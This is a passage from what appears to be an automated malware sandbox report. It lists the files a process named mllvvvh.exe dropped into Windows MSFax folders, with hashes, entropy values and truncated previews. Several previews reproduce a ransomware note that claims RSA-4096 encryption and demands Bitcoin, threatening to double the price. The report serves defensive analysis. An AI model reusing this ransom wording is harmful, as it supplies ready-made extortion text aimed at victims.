                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Inbox\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Inbox\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Inbox\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\SentItems\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\SentItems\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\SentItems\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
